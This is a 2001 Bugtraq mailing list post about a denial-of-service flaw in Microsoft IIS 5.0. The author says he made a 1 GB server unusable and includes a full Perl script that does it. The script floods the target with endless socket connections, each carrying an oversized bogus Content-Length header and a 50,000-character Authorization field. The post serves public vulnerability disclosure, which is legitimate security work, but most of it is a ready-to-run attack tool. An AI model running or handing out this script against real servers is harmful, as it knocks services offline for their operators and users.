Bugtraq mailing list archives

Microsoft IIS/5.0 Content-Length DoS (proved)


From: "Ivan Hernandez Puga" <ivan.hernandez () globalsis com ar>
Date: Wed, 12 Dec 2001 16:01:26 -0300

Well, finally I have done testing about and I have made a 1gb RAM server
to get Out Of Virtual Memory and basically unusable with one script that
uses the flaw exposed on the other mails.
I suppose that now it's a real security bug.

Thanks

Ivan Hernandez
------------------------------------------------------------------------
----------------------------------------------#!/usr/bin/perl
# Written by Ivan Hernandez over code of Georgi Guninski 
use IO::Socket;

print "IIS 5.0 Bogus Content-Length\n";

$port = @ARGV[1];
$host = @ARGV[0];

        $req="GET /ampgn HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic " . "A" x 50000 . "\r\n\r\n";

$i=0;
        while (1) {
                $socket[$i] = IO::Socket::INET->new(PeerAddr =>
$host,PeerPort => $port,Proto => "TCP");
                syswrite($socket[$i],$req,length($req));
                        print ".";
                        $i++;
                
        }

$i=0;

print "\nDone.";

------------------------------------------------------------------------
----------------------------------------------


Current thread: